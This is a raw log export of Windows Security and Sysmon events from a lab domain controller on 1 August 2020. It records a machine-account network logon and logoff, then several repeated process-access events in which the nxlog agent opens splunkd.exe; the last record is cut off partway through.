{"EventTime":"2020-08-01 06:58:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220673,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x96546\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t52710\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x96546","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"52710","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:58:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220674,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x96546\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x96546","LogonType":"3","EventReceivedTime":"2020-08-01 06:58:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6641,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:29.551\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:29.551","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6642,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:30.551\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:30.551","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6643,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:31.551\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:31.551","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6644,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:32.551\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:32.551","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6645,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:33.551\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:33.551","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6646,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:34.551\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 